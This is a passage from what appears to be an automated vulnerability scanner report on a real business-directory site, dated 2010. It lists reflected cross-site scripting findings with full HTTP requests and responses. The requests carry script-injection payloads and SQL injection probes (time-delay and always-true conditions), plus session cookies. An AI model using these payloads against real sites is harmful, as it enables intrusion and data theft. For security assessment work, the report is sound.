X-Powered-By: ASP.NET
Content-Length: 551
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=348b89<script>alert(1)</script>4b89bbb041aa5281&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&S
...[SNIP]...

4.244. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload cee24<script>alert(1)</script>6204f74be517d3ff3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3&cee24<script>alert(1)</script>6204f74be517d3ff3=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp?ChangeEmail=&KeyWord=--+Keyword+--&RegionId=&SubCatId=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:49:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 555
Content-Type: text/html
Cache-control: private

<h1>Form</h1><h1>QueryString</h1>ChangeEmail=%27;WAITFOR%20DELAY%20%270:0:25%27--&KeyWord=--+Keyword+--&RegionId=3&SubCatId=3&AdTagCountyId=3&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail
...[SNIP]...
1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3&cee24<script>alert(1)</script>6204f74be517d3ff3=1

4.245. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 31b01<script>alert(1)</script>10f73b61769 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 391

AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3&31b01<script>alert(1)</script>10f73b61769=1

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:23:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 468
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=1 AND 'NS='ss&AdTagPriceIndx=3&Amenities=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&ctRS=10&GroupId=3&intl=3&KeyWord=3&Lid=3&LIndex=3&RegionId=3&SoL=3&strLsId=
...[SNIP]...
1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&strStates=3&SubCatId=3&UserEmail=netsparker%40example.com&UserPwd=3&31b01<script>alert(1)</script>10f73b61769=1<h1>
...[SNIP]...

4.246. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds0 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba24"><script>alert(1)</script>48f91dc7394142829 was submitted in the sLsIds0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281dba24"><script>alert(1)</script>48f91dc7394142829&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-519626%2c125-521135%2c125-521146%2c125-531280%2c125-524507&sLsIdsT=125-524511%2c125-548214%2c125-523820%2c125-561740%2c125-535592%2c125-526559%2c125-561743%2c125-543364%2c125-526572%2c125-535768&sLsIdsU=125-561744%2c125-540337%2c125-530055%2c125-539271%2c125-533352%2c125-534277%2c125-554091%2c125-535784%2c125-536134%2c125-536168&sLsIdsV=125-537139%2c125-538939%2c125-537922%2c125-561745%2c125-540042%2c125-542538%2c125-561832%2c125-560772%2c125-561851%2c125-554861&sLsIdsW=125-545138%2c125-561852%2c125-561853%2c125-561855%2c125-561856%2c125-561860%2c125-553593%2c125-561861%2c125-557156%2c125-561863&sLsIdsX=125-560787%2c125-555117%2c125-555993%2c125-560783%2c125-558689%2c125-557187%2c125-557539%2c125-560788%2c125-560650%2c125-562241&sLsIdsY=125-564252%2c125-472625%2c125-565009%2c125-565408%2c125-565406%2c125-566364%2c125-566155%2c125-566429%2c125-569520%2c125-560929&sLsIdsZ=125-490731%2c125-505509%2c125-552073%2c125-512867%2c125-528218%2c125-528217%2c125-546102%2c125-564120%2c125-564628%2c125-528175&SoL=&SOrder=A&Sort=D&strRegion=all+areas&strRegions=5%2bAll+Areas%3a%3a50000%2bAlabama%3a%3a51000%2bAlaska%3a%3a52000%2bArizona%3a%3a53000%2bArkansas%3a%3a54100%2bCalifornia%3a%3a55000%2bColorado%3a%3a56000%2bConnecticut%3a%3a57000%2bDelaware%3a%3a59100%2bFlorida%3a%3a60000%2bGeorgia%3a%3a61000%2bHawaii%3a%3a62000%2bIdaho%3a%3a63000%2bIllinois%3a%3a64000%2bIndiana%3a%3a65000%2bIowa%3a%3a66000%2bKansas%3a%3a67000%2bKentucky%3a%3a68100%2bLouisiana%3a%3a69000%2bMaine%3a%3a70000%2bMaryland%3a%3a71200%2bMassachusetts%3a%3a72000%2bMichigan%3a%3a73000%2bMinnesota%3a%3a74000%2bMississippi%3a%3a75000%2bMissouri%3a%3a76000%2bMontana%3a%3a77000%2bNebraska%3a%3a78100%2bNevada%3a%3a79000%2bNew+Hampshire%3a%3a80100%2bNew+Jersey%3a%3a81000%2bNew+Mexico%3a%3a2022%2bNew+York%3a%3a82400%2bNew+York+City+Metro+Area%3a%3a83000%2bNorth+Carolina%3a%3a84000%2bNorth+Datoka%3a%3a85000%2bOhio%3a%3a86000%2bOklahoma%3a%3a87000%2bOregon%3a%3a88000%2bPennsylvania%3a%3a89000%2bRhode+Island%3a%3a90000%2bSouth+Carolina%3a%3a91000%2bSouth+Dakota%3a%3a92000%2bTennessee%3a%3a93000%2bTexas%3a%3a94000%2bUtah%3a%3a95000%2bVermont%3a%3a96000%2bVirginia%3a%3a97000%2bWashington%3a%3a58000%2bWashington+D.C.%3a%3a98000%2bWest+Virginia%3a%3a99000%2bWisconsin%3a%3a100000%2bWyoming%3a%3a&strSQL3=Execute+uspSearchListingsByLsIds+'BIZDIR'%2c&strStates=&SubCatId=&ThisPage=1 HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:22:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 87637
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCADTSTCS=KGIPGLGAIADPJJHHLNMBGKNB; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

   
   <head>
       <meta http-equi
...[SNIP]...
<input type="hidden" name="sLsIds0" value="80-N1011083,80-N1009073,80-N906131,80-N1011114,80-N1011021,80-N1008162,80-N1011102,80-N1009292,80-N1011022,80-N1010281dba24"><script>alert(1)</script>48f91dc7394142829">
...[SNIP]...

4.247. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds0 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds0 request parameter is copied into the HTML document as plain text between tags. The payload dc9f3<script>alert(1)</script>f60165eff7f was submitted in the sLsIds0 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281dc9f3<script>alert(1)</script>f60165eff7f&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:25:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281dc9f3<script>alert(1)</script>f60165eff7f&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N1009242&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2
...[SNIP]...

4.248. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds1 request parameter is copied into the HTML document as plain text between tags. The payload 8c27c<script>alert(1)</script>376d5b612a4 was submitted in the sLsIds1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /BusinessDirectory/List_Listings.asp HTTP/1.1
Referer: http://listings.nytimes.com/BusinessDirectory/List_Listings.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322;)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: listings.nytimes.com
Cookie: ASPSESSIONIDSCDTQSBS=CIDMHLFAMCCFKPLBBHALLAAF; ASPSESSIONIDACCRTTDT=EHDHDNGAFBGCHINIICBALKAB; ASPSESSIONIDSCBSSQAT=IBNKJLNDLPHGNPGDKFHLPIOI; ASPSESSIONIDCADQTTDT=ENMHKJGAMFJMFIFDNFGMGMOE; ASPSESSIONIDSABRQSAS=FELKNADAPLOANHOJMNHCBFEN; ASPSESSIONIDCCDTSTDT=JFOLPOGAMCPNEGJMKEMOJBLJ; ASPSESSIONIDSCCSTRAT=EDDDEGAAKEEOJFIKLGKLFKHO; ASPSESSIONIDCADTSTCS=KDIPGLGAPHDILBCBFEABDOGA
Accept-Encoding: gzip, deflate
Content-Length: 7048

AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=3&
...[SNIP]...
c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N10092428c27c<script>alert(1)</script>376d5b612a4&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-4739
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Mon, 15 Nov 2010 07:25:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7122
Content-Type: text/html
Cache-control: private

<h1>Form</h1>AdTagCountyId=' OR '1'='1&AdTagPriceIndx=3&CategoryId=BIZDIR&ChangeEmail=netsparker%40example.com&cid=999&DOrder=A&GroupId=3&intl=3&KeyWord=3&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=
...[SNIP]...
2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N10092428c27c<script>alert(1)</script>376d5b612a4&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-47395
...[SNIP]...

4.249. http://listings.nytimes.com/BusinessDirectory/List_Listings.asp [sLsIds1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://listings.nytimes.com
Path:   /BusinessDirectory/List_Listings.asp

Issue detail

The value of the sLsIds1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72c71"><script>alert(1)</script>2698f5057612cf869 was submitted in the sLsIds1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /BusinessDirectory/List_Listings.asp?AdTagCountyId=&AdTagPriceIndx=&CategoryId=BIZDIR&ChangeEmail=&cid=999&DOrder=A&GroupId=&intl=&KeyWord=&LastPage=40&LOrder=A&NOrder=A&Order=A&POrder=A&RegionId=&ROrder=A&RSCount=2500&sLsIds0=80-N1011083%2c80-N1009073%2c80-N906131%2c80-N1011114%2c80-N1011021%2c80-N1008162%2c80-N1011102%2c80-N1009292%2c80-N1011022%2c80-N1010281&sLsIds1=80-N1010223%2c80-N1010192%2c80-N1011111%2c80-N1011051%2c80-N1010272%2c80-N1011071%2c80-N1009282%2c80-N1010211%2c80-N1011121%2c80-N100924272c71"><script>alert(1)</script>2698f5057612cf869&sLsIds2=80-N1010218%2c20-1000297132_020%2c125-454145%2c125-500168%2c125-561603%2c125-557500%2c125-505633%2c125-502057%2c125-569378%2c125-451879&sLsIds3=125-563290%2c125-492069%2c125-487258%2c125-473954%2c125-516760%2c125-529105%2c125-529136%2c125-565044%2c125-452044%2c125-471500&sLsIds4=125-558791%2c125-555521%2c125-561463%2c125-549434%2c125-434068%2c125-530728%2c125-564022%2c125-557581%2c125-560091%2c125-563157&sLsIds5=125-491745%2c125-547950%2c125-509222%2c125-568138%2c125-557766%2c125-559177%2c125-537020%2c125-506111%2c125-560157%2c125-566240&sLsIds6=125-557675%2c125-551396%2c125-559267%2c125-533573%2c125-458445%2c125-538467%2c125-471913%2c125-482897%2c125-535950%2c125-499401&sLsIds7=125-486445%2c125-529496%2c125-429362%2c125-501989%2c125-502772%2c125-534073%2c125-530131%2c125-494155%2c125-517168%2c125-557932&sLsIds8=125-514452%2c125-541145%2c125-416753%2c125-444446%2c125-537604%2c125-502641%2c125-567841%2c125-564153%2c20-1000290506_030%2c125-570359&sLsIds9=125-539476%2c125-431610%2c125-442946%2c125-560310%2c125-497124%2c125-529949%2c125-568533%2c125-558371%2c125-553006%2c125-553112&sLsIdsA=125-560826%2c125-549432%2c125-552794%2c125-545063%2c125-552800%2c125-549795%2c125-552790%2c125-552796%2c125-551814%2c125-545983&sLsIdsAA=125-553610%2c125-518851%2c125-553607%2c125-556074%2c125-558240%2c125-499512%2c125-526065%2c125-462985%2c125-544762%2c125-560817&sLsIdsAB=125-522621%2c125-567005%2c125-364577%2c125-333056%2c125-565752%2c125-389754%2c125-405051%2c125-558962%2c125-441721%2c125-542506&sLsIdsAC=125-521855%2c125-495755%2c125-503906%2c125-565552%2c125-556750%2c125-475131%2c125-202650%2c125-510030%2c125-570191%2c125-475695&sLsIdsAD=125-555585%2c125-565528%2c125-520249%2c125-541247%2c125-556121%2c125-547008%2c125-568447%2c125-545194%2c125-512492%2c125-297311&sLsIdsB=125-551828%2c125-552791%2c125-552803%2c125-453304%2c125-552666%2c125-521482%2c125-521477%2c125-521479%2c125-488823%2c125-545359&sLsIdsC=125-527579%2c125-525464%2c125-527584%2c125-475581%2c125-510064%2c125-565038%2c125-554987%2c125-559008%2c125-525927%2c125-526128&sLsIdsD=125-526018%2c125-526144%2c125-529057%2c125-567748%2c125-526023%2c125-555190%2c125-559612%2c125-555175%2c125-554984%2c125-547837&sLsIdsE=125-547750%2c125-548054%2c125-525923%2c125-494906%2c125-531825%2c125-550469%2c125-567828%2c125-490106%2c125-566918%2c125-529618&sLsIdsF=125-463922%2c125-464100%2c125-488817%2c125-557391%2c125-522086%2c125-548195%2c125-553895%2c125-558344%2c125-564715%2c125-556870&sLsIdsG=125-554611%2c125-518058%2c125-532291%2c125-532292%2c125-482057%2c125-569094%2c125-555551%2c125-462478%2c125-469804%2c125-500828&sLsIdsH=125-504736%2c125-521946%2c125-517146%2c125-518850%2c125-524081%2c125-527129%2c125-527511%2c125-527508%2c125-528677%2c125-533450&sLsIdsI=125-540051%2c125-544122%2c125-549166%2c125-546131%2c125-550891%2c125-563445%2c125-560883%2c125-560309%2c125-565198%2c125-565179&sLsIdsJ=125-566478%2c125-566482%2c125-564856%2c125-565126%2c125-569444%2c125-531599%2c125-550866%2c125-560171%2c125-539587%2c125-567941&sLsIdsK=125-566956%2c125-513013%2c125-493766%2c125-521916%2c125-522018%2c125-554134%2c125-521507%2c125-521264%2c125-541992%2c125-521281&sLsIdsL=125-557904%2c125-565259%2c125-442451%2c125-551241%2c125-488296%2c125-568500%2c125-569515%2c125-548226%2c125-559444%2c125-565130&sLsIdsM=125-395953%2c125-491487%2c125-444457%2c125-464308%2c125-454440%2c125-454446%2c125-472602%2c125-418913%2c125-422194%2c125-561731&sLsIdsN=125-483424%2c125-471203%2c125-430646%2c125-436208%2c125-561736%2c125-394065%2c125-539553%2c125-454345%2c125-463424%2c125-470693&sLsIdsO=125-470909%2c125-481310%2c125-486834%2c125-490712%2c125-419767%2c125-497400%2c125-561713%2c125-496638%2c125-498359%2c125-499448&sLsIdsP=125-499423%2c125-499451%2c125-500061%2c125-500014%2c125-501827%2c125-504342%2c125-505889%2c125-505964%2c125-507572%2c125-561739&sLsIdsQ=125-512454%2c125-531166%2c125-510950%2c125-519482%2c125-550392%2c125-486912%2c125-560934%2c125-555722%2c125-562036%2c125-555902&sLsIdsR=125-493413%2c125-548107%2c125-566195%2c125-549209%2c125-496651%2c125-550801%2c125-551463%2c125-564528%2c125-544691%2c125-511935&sLsIdsS=125-513610%2c125-514528%2c125-514558%2c125-518925%2c125-534894%2c125-5196